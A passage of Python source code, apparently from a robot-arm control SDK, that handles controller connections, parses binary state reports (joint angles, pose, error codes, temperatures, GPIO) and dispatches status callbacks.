self._connect_report()
except:
self._stream_report = None
if self._check_version(is_first=True) < 0:
self.disconnect()
raise Exception('failed to check version, close')
self.arm_cmd.set_debug(self._debug)
if self._max_callback_thread_count < 0 and asyncio is not None:
self._asyncio_loop = asyncio.new_event_loop()
self._asyncio_loop_thread = threading.Thread(target=self._run_asyncio_loop, daemon=True)
self._thread_manage.append(self._asyncio_loop_thread)
self._asyncio_loop_thread.start()
elif self._max_callback_thread_count > 0 and ThreadPool is not None:
self._pool = ThreadPool(self._max_callback_thread_count)
if self._stream.connected and self._enable_report:
self._report_thread = threading.Thread(target=self._report_thread_handle, daemon=True)
self._report_thread.start()
self._thread_manage.append(self._report_thread)
self._report_connect_changed_callback()
else:
self._stream = SerialPort(self._port)
if not self.connected:
raise Exception('connect serail failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdSer(self._stream)
self._stream_type = 'serial'
if self._max_callback_thread_count < 0 and asyncio is not None:
self._asyncio_loop = asyncio.new_event_loop()
self._asyncio_loop_thread = threading.Thread(target=self._run_asyncio_loop, daemon=True)
self._thread_manage.append(self._asyncio_loop_thread)
self._asyncio_loop_thread.start()
elif self._max_callback_thread_count > 0 and ThreadPool is not None:
self._pool = ThreadPool(self._max_callback_thread_count)
if self._enable_report:
self._report_thread = threading.Thread(target=self._auto_get_report_thread, daemon=True)
self._report_thread.start()
self._report_connect_changed_callback(True, True)
self._thread_manage.append(self._report_thread)
else:
self._report_connect_changed_callback(True, False)
self._check_version(is_first=True)
self.arm_cmd.set_debug(self._debug)
self.set_timeout(self._cmd_timeout)
if self._rewrite_modbus_baudrate_method:
setattr(self.arm_cmd, 'set_modbus_baudrate_old', self.arm_cmd.set_modbus_baudrate)
setattr(self.arm_cmd, 'set_modbus_baudrate', self._core_set_modbus_baudrate)
if asyncio:
def _run_asyncio_loop(self):
@asyncio.coroutine
def _asyncio_loop():
logger.debug('asyncio thread start ...')
while self.connected:
yield from asyncio.sleep(0.001)
logger.debug('asyncio thread exit ...')
try:
asyncio.set_event_loop(self._asyncio_loop)
self._asyncio_loop_alive = True
self._asyncio_loop.run_until_complete(_asyncio_loop())
except Exception as e:
pass
self._asyncio_loop_alive = False
@staticmethod
@asyncio.coroutine
def _async_run_callback(callback, msg):
yield from callback(msg)
def _run_callback(self, callback, msg, name='', enable_callback_thread=True):
try:
if self._asyncio_loop_alive and enable_callback_thread:
coroutine = self._async_run_callback(callback, msg)
asyncio.run_coroutine_threadsafe(coroutine, self._asyncio_loop)
elif self._pool is not None and enable_callback_thread:
self._pool.apply_async(callback, args=(msg,))
else:
callback(msg)
except Exception as e:
logger.error('run {} callback exception: {}'.format(name, e))
def _core_set_modbus_baudrate(self, baudrate, use_old=False):
"""
此函数是用于覆盖core.set_modbus_baudrate方法,主要用于兼容旧代码
新代码建议直接使用set_tgpio_modbus_baudrate此接口
:param baudrate:
:param use_old:
为True时调用原来的core.set_modbus_baudrate方法
为False时使用新的set_tgpio_modbus_baudrate
:return [code, ...]
"""
if not use_old:
ret = self.set_tgpio_modbus_baudrate(baudrate)
return [ret, self.modbus_baud]
else:
return self.arm_cmd.set_modbus_baudrate_old(baudrate)
def disconnect(self):
try:
self._stream.close()
except:
pass
if self._stream_report:
try:
self._stream_report.close()
except:
pass
self._is_ready = False
try:
self._stream.join()
except:
pass
if self._stream_report:
try:
self._stream_report.join()
except:
pass
self._report_connect_changed_callback(False, False)
with self._pause_cond:
self._pause_cond.notifyAll()
self._clean_thread()
def set_timeout(self, timeout):
self._cmd_timeout = timeout
if self.arm_cmd is not None:
self._cmd_timeout = self.arm_cmd.set_timeout(self._cmd_timeout)
return self._cmd_timeout
def _connect_report(self):
if self._enable_report:
if self._stream_report:
try:
self._stream_report.close()
except:
pass
time.sleep(2)
if self._report_type == 'real':
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_REAL_PORT,
buffer_size=1024 if not self._is_old_protocol else 87,
forbid_uds=self._forbid_uds)
elif self._report_type == 'normal':
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_NORM_PORT,
buffer_size=XCONF.SocketConf.TCP_REPORT_NORMAL_BUF_SIZE if not self._is_old_protocol else 87,
forbid_uds=self._forbid_uds)
else:
self._stream_report = SocketPort(
self._port, XCONF.SocketConf.TCP_REPORT_RICH_PORT,
buffer_size=1024 if not self._is_old_protocol else 187,
forbid_uds=self._forbid_uds)
def __report_callback(self, report_id, item, name=''):
if report_id in self._report_callbacks.keys():
for callback in self._report_callbacks[report_id]:
self._run_callback(callback, item, name=name)
def _report_connect_changed_callback(self, main_connected=None, report_connected=None):
if self.REPORT_CONNECT_CHANGED_ID in self._report_callbacks.keys():
for callback in self._report_callbacks[self.REPORT_CONNECT_CHANGED_ID]:
self._run_callback(callback, {
'connected': self._stream and self._stream.connected if main_connected is None else main_connected,
'reported': self._stream_report and self._stream_report.connected if report_connected is None else report_connected,
}, name='connect_changed')
def _report_state_changed_callback(self):
if self._ignore_state:
return
self.__report_callback(self.REPORT_STATE_CHANGED_ID, {'state': self._state}, name='state_changed')
def _report_mode_changed_callback(self):
self.__report_callback(self.REPORT_MODE_CHANGED_ID, {'mode': self._mode}, name='mode_changed')
def _report_mtable_mtbrake_changed_callback(self):
self.__report_callback(self.REPORT_MTABLE_MTBRAKE_CHANGED_ID, {
'mtable': [bool(i) for i in self._arm_motor_enable_states],
'mtbrake': [bool(i) for i in self._arm_motor_brake_states]
}, name='(mtable/mtbrake)_changed')
def _report_error_warn_changed_callback(self):
if self._ignore_error:
return
self.__report_callback(self.REPORT_ERROR_WARN_CHANGED_ID, {
'warn_code': self._warn_code,
'error_code': self._error_code,
}, name='(error/warn)_changed')
def _report_cmdnum_changed_callback(self):
self.__report_callback(self.REPORT_CMDNUM_CHANGED_ID, {
'cmdnum': self._cmd_num
}, name='cmdnum_changed')
def _report_temperature_changed_callback(self):
self.__report_callback(self.REPORT_TEMPERATURE_CHANGED_ID, {
'temperatures': self.temperatures
}, name='temperature_changed')
def _report_count_changed_callback(self):
self.__report_callback(self.REPORT_COUNT_CHANGED_ID, {'count': self._count}, name='count_changed')
def _report_iden_progress_changed_callback(self):
self.__report_callback(self.REPORT_IDEN_PROGRESS_CHANGED_ID, {'progress': self._iden_progress}, name='iden_progress_changed')
def _report_location_callback(self):
if self.REPORT_LOCATION_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_LOCATION_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
self._run_callback(callback, ret, name='location')
def _report_callback(self):
if self.REPORT_ID in self._report_callbacks.keys():
for item in self._report_callbacks[self.REPORT_ID]:
callback = item['callback']
ret = {}
if item['cartesian']:
ret['cartesian'] = self.position.copy()
if item['joints']:
ret['joints'] = self.angles.copy()
if item['error_code']:
ret['error_code'] = self._error_code
if item['warn_code']:
ret['warn_code'] = self._warn_code
if item['state']:
ret['state'] = self._state
if item['mtable']:
mtable = [bool(i) for i in self._arm_motor_enable_states]
ret['mtable'] = mtable.copy()
if item['mtbrake']:
mtbrake = [bool(i) for i in self._arm_motor_brake_states]
ret['mtbrake'] = mtbrake.copy()
if item['cmdnum']:
ret['cmdnum'] = self._cmd_num
self._run_callback(callback, ret, name='report')
def _report_thread_handle(self):
main_socket_connected = self._stream and self._stream.connected
report_socket_connected = self._stream_report and self._stream_report.connected
while self.connected:
try:
if not self._stream_report or not self._stream_report.connected:
self.get_err_warn_code()
if report_socket_connected:
report_socket_connected = False
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
self._connect_report()
continue
if not report_socket_connected:
report_socket_connected = True
self._report_connect_changed_callback(main_socket_connected, report_socket_connected)
recv_data = self._stream_report.read(1)
if recv_data != -1:
size = convert.bytes_to_u32(recv_data)
if self._is_old_protocol and size > 256:
self._is_old_protocol = False
self._handle_report_data(recv_data)
else:
if self.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self.connected:
break
elif not self._stream_report or not self._stream_report.connected:
self._connect_report()
except Exception as e:
logger.error(e)
if self.connected:
code, err_warn = self.get_err_warn_code()
if code == -1 or code == 3:
break
if not self.connected:
break
if not self._stream_report or not self._stream_report.connected:
self._connect_report()
time.sleep(0.001)
self.disconnect()
def _handle_report_data(self, data):
def __handle_report_normal_old(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]))
state, mtbrake, mtable, error_code, warn_code = rx_data[4:9]
angles = convert.bytes_to_fp32s(rx_data[9:7 * 4 + 9], 7)
pose = convert.bytes_to_fp32s(rx_data[37:6 * 4 + 37], 6)
cmd_num = convert.bytes_to_u16(rx_data[61:63])
pose_offset = convert.bytes_to_fp32s(rx_data[63:6 * 4 + 63], 6)
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('Error, code: {}'.format(self._error_code), color='red')
else:
pretty_print('Error had clean', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('Warn, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('Warnning had clean', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
reset_tgpio_params = False
reset_linear_track_params = False
if 0 < error_code <= 17:
reset_tgpio_params = True
reset_linear_track_params = True
elif error_code in [19, 28]:
reset_tgpio_params = True
elif error_code == 111:
reset_linear_track_params = True
if reset_tgpio_params:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
if reset_linear_track_params:
self.linear_track_baud = -1
self.linear_track_is_enabled = False
self.linear_track_speed = 1
# if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
# self.modbus_baud = -1
# self.robotiq_is_activated = False
# self.gripper_is_enabled = False
# self.bio_gripper_is_enabled = False
# self.bio_gripper_speed = 0
# self.gripper_is_enabled = False
# self.gripper_speed = 0
# self.gripper_version_numbers = [-1, -1, -1]
# self.linear_track_is_enabled = False
# self.linear_track_speed = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
self._cmd_num = cmd_num
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
for i in range(len(pose_offset)):
pose_offset[i] = filter_invaild_number(pose_offset[i], 3 if i < 3 else 6, default=self._position_offset[i])
if not (0 < self._error_code <= 17):
self._position = pose
if not (0 < self._error_code <= 17):
self._angles = angles
if not (0 < self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code == 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
def __handle_report_rich_old(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[87:93]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
if self._arm_type == 5:
self._arm_axis = 5
elif self._arm_type == 6:
self._arm_axis = 6
elif self._arm_type == 3:
self._arm_axis = 7
ver_msg = rx_data[93:122]
# self._version = str(ver_msg, 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[123:143], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[143:163], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[163:171], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
sv3_msg = convert.bytes_to_u16s(rx_data[171:187], 8)
self._first_report_over = True
def __handle_report_real(rx_data):
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
self._state = state
self._report_state_changed_callback()
if state in [4, 5]:
self._is_ready = False
else:
self._is_ready = True
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
if not (0 < self._error_code <= 17):
self._position = pose
if not (0 < self._error_code <= 17):
self._angles = angles
self._joints_torque = torque
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._state not in [4, 5]:
self._sync()
self._is_sync = True
length = len(rx_data)
if length >= 135:
# FT_SENSOR
self._ft_ext_force = convert.bytes_to_fp32s(rx_data[87:111], 6)
self._ft_raw_force = convert.bytes_to_fp32s(rx_data[111:135], 6)
def __handle_report_normal(rx_data):
# print('length:', convert.bytes_to_u32(rx_data[0:4]), len(rx_data))
state, mode = rx_data[4] & 0x0F, rx_data[4] >> 4
# if state != self._state or mode != self._mode:
# print('mode: {}, state={}, time={}'.format(mode, state, time.time()))
cmd_num = convert.bytes_to_u16(rx_data[5:7])
angles = convert.bytes_to_fp32s(rx_data[7:7 * 4 + 7], 7)
pose = convert.bytes_to_fp32s(rx_data[35:6 * 4 + 35], 6)
torque = convert.bytes_to_fp32s(rx_data[59:7 * 4 + 59], 7)
mtbrake, mtable, error_code, warn_code = rx_data[87:91]
pose_offset = convert.bytes_to_fp32s(rx_data[91:6 * 4 + 91], 6)
tcp_load = convert.bytes_to_fp32s(rx_data[115:4 * 4 + 115], 4)
collis_sens, teach_sens = rx_data[131:133]
# if (collis_sens not in list(range(6)) or teach_sens not in list(range(6))) \
# and ((error_code != 0 and error_code not in controller_error_keys) or (warn_code != 0 and warn_code not in controller_warn_keys)):
# self._stream_report.close()
# logger.warn('ReportDataException: data={}'.format(rx_data))
# return
length = convert.bytes_to_u32(rx_data[0:4])
data_len = len(rx_data)
if (length != data_len and (length != 233 or data_len != 245)) or collis_sens not in list(range(6)) or teach_sens not in list(range(6)) \
or mode not in list(range(12)) or state not in list(range(10)):
self._stream_report.close()
logger.warn('ReportDataException: length={}, data_len={}, '
'state={}, mode={}, collis_sens={}, teach_sens={}, '
'error_code={}, warn_code={}'.format(
length, data_len,
state, mode, collis_sens, teach_sens, error_code, warn_code
))
return
self._gravity_direction = convert.bytes_to_fp32s(rx_data[133:3*4 + 133], 3)
reset_tgpio_params = False
reset_linear_track_params = False
if 0 < error_code <= 17:
reset_tgpio_params = True
reset_linear_track_params = True
elif error_code in [19, 28]:
reset_tgpio_params = True
elif error_code == 111:
reset_linear_track_params = True
if reset_tgpio_params:
self.modbus_baud = -1
self.robotiq_is_activated = False
self.gripper_is_enabled = False
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
if reset_linear_track_params:
self.linear_track_baud = -1
self.linear_track_is_enabled = False
self.linear_track_speed = 0
# if error_code in [1, 10, 11, 12, 13, 14, 15, 16, 17, 19, 28]:
# self.modbus_baud = -1
# self.robotiq_is_activated = False
# self.gripper_is_enabled = False
# self.bio_gripper_is_enabled = False
# self.bio_gripper_speed = -1
# self.gripper_speed = -1
# self.gripper_version_numbers = [-1, -1, -1]
# self.linear_track_is_enabled = False
# self.linear_track_speed = -1
# print('torque: {}'.format(torque))
# print('tcp_load: {}'.format(tcp_load))
# print('collis_sens: {}, teach_sens: {}'.format(collis_sens, teach_sens))
if error_code != self._error_code or warn_code != self._warn_code:
if error_code != self._error_code:
self._error_code = error_code
if self._error_code != 0:
pretty_print('ControllerError, code: {}'.format(self._error_code), color='red')
else:
pretty_print('ControllerError had clean', color='blue')
if warn_code != self._warn_code:
self._warn_code = warn_code
if self._warn_code != 0:
pretty_print('ControllerWarning, code: {}'.format(self._warn_code), color='yellow')
else:
pretty_print('ControllerWarning had clean', color='blue')
self._report_error_warn_changed_callback()
logger.info('OnReport -> err={}, warn={}, state={}, cmdnum={}, mtbrake={}, mtable={}, mode={}'.format(
error_code, warn_code, state, cmd_num, mtbrake, mtable, mode
))
elif not self._only_report_err_warn_changed:
self._report_error_warn_changed_callback()
if cmd_num != self._cmd_num:
self._cmd_num = cmd_num
self._report_cmdnum_changed_callback()
if state != self._state:
if not self._has_motion_cmd and self._state in [0, 1] and state not in [0, 1]:
self._need_sync = True
if self._state in [0, 1] and state not in [0, 1]:
self._has_motion_cmd = False
# print('old_state: {}, new_state: {}, has_motion_cmd={}, need_sync: {}'.format(self._state, state, self._has_motion_cmd, self._need_sync))
self._state = state
self._report_state_changed_callback()
if mode != self._mode:
self._mode = mode
self._report_mode_changed_callback()
mtbrake = [mtbrake & 0x01, mtbrake >> 1 & 0x01, mtbrake >> 2 & 0x01, mtbrake >> 3 & 0x01,
mtbrake >> 4 & 0x01, mtbrake >> 5 & 0x01, mtbrake >> 6 & 0x01, mtbrake >> 7 & 0x01]
mtable = [mtable & 0x01, mtable >> 1 & 0x01, mtable >> 2 & 0x01, mtable >> 3 & 0x01,
mtable >> 4 & 0x01, mtable >> 5 & 0x01, mtable >> 6 & 0x01, mtable >> 7 & 0x01]
if mtbrake != self._arm_motor_brake_states or mtable != self._arm_motor_enable_states:
self._arm_motor_enable_states = mtable
self._arm_motor_brake_states = mtbrake
self._report_mtable_mtbrake_changed_callback()
if not self._is_first_report:
if state in [4, 5] or not all([bool(item[0] & item[1]) for item in zip(mtbrake, mtable)][:self.axis]):
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
else:
self._is_ready = False
self._is_first_report = False
if not self._is_ready:
self._sleep_finish_time = 0
self._error_code = error_code
self._warn_code = warn_code
self.arm_cmd.has_err_warn = error_code != 0 or warn_code != 0
_state = self._state
self._state = state
if self.state != 3 and (_state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
self._mode = mode
self._cmd_num = cmd_num
update_time = time.time()
self._last_update_cmdnum_time = update_time
self._last_update_state_time = update_time
self._last_update_err_time = update_time
self._arm_motor_brake_states = mtbrake
self._arm_motor_enable_states = mtable
self._joints_torque = torque
if compare_version(self.version_number, (0, 2, 0)):
self._tcp_load = [float('{:.3f}'.format(tcp_load[0])), [float('{:.3f}'.format(i)) for i in tcp_load[1:]]]
else:
self._tcp_load = [float('{:.3f}'.format(tcp_load[0])), [float('{:.3f}'.format(i * 1000)) for i in tcp_load[1:]]]
self._collision_sensitivity = collis_sens
self._teach_sensitivity = teach_sens
for i in range(len(pose)):
pose[i] = filter_invaild_number(pose[i], 3 if i < 3 else 6, default=self._position[i])
for i in range(len(angles)):
angles[i] = filter_invaild_number(angles[i], 6, default=self._angles[i])
for i in range(len(pose_offset)):
pose_offset[i] = filter_invaild_number(pose_offset[i], 3 if i < 3 else 6, default=self._position_offset[i])
if not (0 < self._error_code <= 17):
self._position = pose
if not (0 < self._error_code <= 17):
self._angles = angles
if not (0 < self._error_code <= 17):
self._position_offset = pose_offset
self._report_location_callback()
self._report_callback()
if not self._is_sync and self._error_code == 0 and self._state not in [4, 5]:
self._sync()
self._is_sync = True
elif self._need_sync:
self._need_sync = False
# self._sync()
def __handle_report_rich(rx_data):
report_time = time.time()
interval = report_time - self._last_report_time
self._max_report_interval = max(self._max_report_interval, interval)
self._last_report_time = report_time
# print('interval={}, max_interval={}'.format(interval, self._max_report_interval))
__handle_report_normal(rx_data)
(self._arm_type,
arm_axis,
self._arm_master_id,
self._arm_slave_id,
self._arm_motor_tid,
self._arm_motor_fid) = rx_data[145:151]
if 7 >= arm_axis >= 5:
self._arm_axis = arm_axis
# self._version = str(rx_data[151:180], 'utf-8')
trs_msg = convert.bytes_to_fp32s(rx_data[181:201], 5)
# trs_msg = [i[0] for i in trs_msg]
(self._tcp_jerk,
self._min_tcp_acc,
self._max_tcp_acc,
self._min_tcp_speed,
self._max_tcp_speed) = trs_msg
# print('tcp_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._tcp_jerk, self._min_tcp_acc, self._max_tcp_acc, self._min_tcp_speed, self._max_tcp_speed
# ))
p2p_msg = convert.bytes_to_fp32s(rx_data[201:221], 5)
# p2p_msg = [i[0] for i in p2p_msg]
(self._joint_jerk,
self._min_joint_acc,
self._max_joint_acc,
self._min_joint_speed,
self._max_joint_speed) = p2p_msg
# print('joint_jerk: {}, min_acc: {}, max_acc: {}, min_speed: {}, max_speed: {}'.format(
# self._joint_jerk, self._min_joint_acc, self._max_joint_acc,
# self._min_joint_speed, self._max_joint_speed
# ))
rot_msg = convert.bytes_to_fp32s(rx_data[221:229], 2)
# rot_msg = [i[0] for i in rot_msg]
self._rot_jerk, self._max_rot_acc = rot_msg
# print('rot_jerk: {}, mac_acc: {}'.format(self._rot_jerk, self._max_rot_acc))
servo_codes = [val for val in rx_data[229:245]]
for i in range(self.axis):
if self._servo_codes[i][0] != servo_codes[i * 2] or self._servo_codes[i][1] != servo_codes[i * 2 + 1]:
print('servo_error_code, servo_id={}, status={}, code={}'.format(i + 1, servo_codes[i * 2], servo_codes[i * 2 + 1]))
self._servo_codes[i][0] = servo_codes[i * 2]
self._servo_codes[i][1] = servo_codes[i * 2 + 1]
self._first_report_over = True
# length = convert.bytes_to_u32(rx_data[0:4])
length = len(rx_data)
if length >= 252:
temperatures = list(map(int, rx_data[245:252]))
if temperatures != self.temperatures:
self._temperatures = temperatures
self._report_temperature_changed_callback()
if length >= 284:
speeds = convert.bytes_to_fp32s(rx_data[252:8 * 4 + 252], 8)
self._realtime_tcp_speed = speeds[0]
self._realtime_joint_speeds = speeds[1:]
# print(speeds[0], speeds[1:])
if length >= 288:
count = convert.bytes_to_u32(rx_data[284:288])
# print(count, rx_data[284:288])
if self._count != -1 and count != self._count:
self._count = count
self._report_count_changed_callback()
self._count = count
if length >= 312:
world_offset = convert.bytes_to_fp32s(rx_data[288:6 * 4 + 288], 6)
for i in range(len(world_offset)):
if i < 3:
world_offset[i] = float('{:.3f}'.format(world_offset[i]))
else:
world_offset[i] = float('{:.6f}'.format(world_offset[i]))
if math.inf not in world_offset and -math.inf not in world_offset and not (10 <= self._error_code <= 17):
self._world_offset = world_offset
if length >= 314:
self._cgpio_reset_enable, self._tgpio_reset_enable = rx_data[312:314]
if length >= 417:
self._is_simulation_robot = bool(rx_data[314])
self._is_collision_detection, self._collision_tool_type = rx_data[315:317]
self._collision_tool_params = convert.bytes_to_fp32s(rx_data[317:341], 6)
voltages = convert.bytes_to_u16s(rx_data[341:355], 7)
voltages = list(map(lambda x: x / 100, voltages))
self._voltages = voltages
currents = convert.bytes_to_fp32s(rx_data[355:383], 7)
self._currents = currents
cgpio_states = []
cgpio_states.extend(rx_data[383:385])
cgpio_states.extend(convert.bytes_to_u16s(rx_data[385:401], 8))
cgpio_states[6:10] = list(map(lambda x: x / 4095.0 * 10.0, cgpio_states[6:10]))
cgpio_states.append(list(map(int, rx_data[401:409])))
cgpio_states.append(list(map(int, rx_data[409:417])))
if self._control_box_type_is_1300 and length >= 433:
cgpio_states[-2].extend(list(map(int, rx_data[417:425])))
cgpio_states[-1].extend(list(map(int, rx_data[425:433])))
self._cgpio_states = cgpio_states
if length >= 481:
# FT_SENSOR
self._ft_ext_force = convert.bytes_to_fp32s(rx_data[433:457], 6)
self._ft_raw_force = convert.bytes_to_fp32s(rx_data[457:481], 6)
if length >= 482:
iden_progress = rx_data[481]
if iden_progress != self._iden_progress:
self._iden_progress = iden_progress
self._report_iden_progress_changed_callback()
if length >= 494:
pose_aa = convert.bytes_to_fp32s(rx_data[482:494], 3)
for i in range(len(pose_aa)):
pose_aa[i] = filter_invaild_number(pose_aa[i], 6, default=self._pose_aa[i])
self._pose_aa = self._position[:3] + pose_aa
try:
if self._report_type == 'real':
__handle_report_real(data)
elif self._report_type == 'rich':
if self._is_old_protocol:
__handle_report_rich_old(data)
else:
__handle_report_rich(data)
else:
if self._is_old_protocol:
__handle_report_normal_old(data)
else:
__handle_report_normal(data)
except Exception as e:
logger.error(e)
def _auto_get_report_thread(self):
logger.debug('get report thread start')
while self.connected:
try:
cmd_num = self._cmd_num
state = self._state
error_code = self._error_code
warn_code = self._warn_code
self.get_cmdnum()
time.sleep(0.01)
self.get_state()
time.sleep(0.01)
self.get_err_warn_code()
time.sleep(0.01)
self.get_servo_angle()
time.sleep(0.01)
self.get_position()
if self.state != 3 and (state == 3 or self._pause_cnts > 0):
with self._pause_cond:
self._pause_cond.notifyAll()
if cmd_num != self._cmd_num:
self._report_cmdnum_changed_callback()
if state != self._state:
self._report_state_changed_callback()
if state in [4, 5]:
# if self._is_ready:
# pretty_print('[report], xArm is not ready to move', color='red')
self._sleep_finish_time = 0
self._is_ready = False
else:
# if not self._is_ready:
# pretty_print('[report], xArm is ready to move', color='green')
self._is_ready = True
if error_code != self._error_code or warn_code != self._warn_code:
self._report_error_warn_changed_callback()
elif not self._only_report_err_warn_changed and (self._error_code != 0 or self._warn_code != 0):
self._report_error_warn_changed_callback()
self._report_location_callback()
self._report_callback()
if self._cmd_num >= self._max_cmd_num:
time.sleep(1)
self._first_report_over = True
time.sleep(0.1)
except:
pass
self.disconnect()
logger.debug('get report thread stopped')
def _sync_tcp(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_angles = self._angles.copy()
if index is None:
self._last_position = self._position.copy()
elif isinstance(index, int) and 0 <= index < 6:
self._last_position[index] = self._position[index]
# print('=============sync_tcp: index={}'.format(index))
def _sync_joints(self, index=None):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
if index is None:
self._last_angles = self._angles.copy()
elif isinstance(index, int) and 0 <= index < 7:
self._last_angles[index] = self._angles[index]
# print('=============sync_joint: index={}'.format(index))
def _sync(self):
if not self._stream_report or not self._stream_report.connected:
self.get_position()
self.get_servo_angle()
self._last_position = self._position.copy()
self._last_angles = self._angles.copy()
# print('=============sync_all')
def _set_params(self, **kwargs):
is_radian = kwargs.get('is_radian', self._default_is_radian)
if 'X' in kwargs and isinstance(kwargs['X'], (int, float)):
self._last_position[0] = kwargs.get('X')
if 'Y' in kwargs and isinstance(kwargs['Y'], (int, float)):
self._last_position[1] = kwargs.get('Y')
if 'Z' in kwargs and isinstance(kwargs['Z'], (int, float)):
self._last_position[2] = kwargs.get('Z')
if 'A' in kwargs and isinstance(kwargs['A'], (int, float)):
self._last_position[3] = kwargs.get('A') if is_radian else math.radians(kwargs.get('A'))
if 'B' in kwargs and isinstance(kwargs['B'], (int, float)):
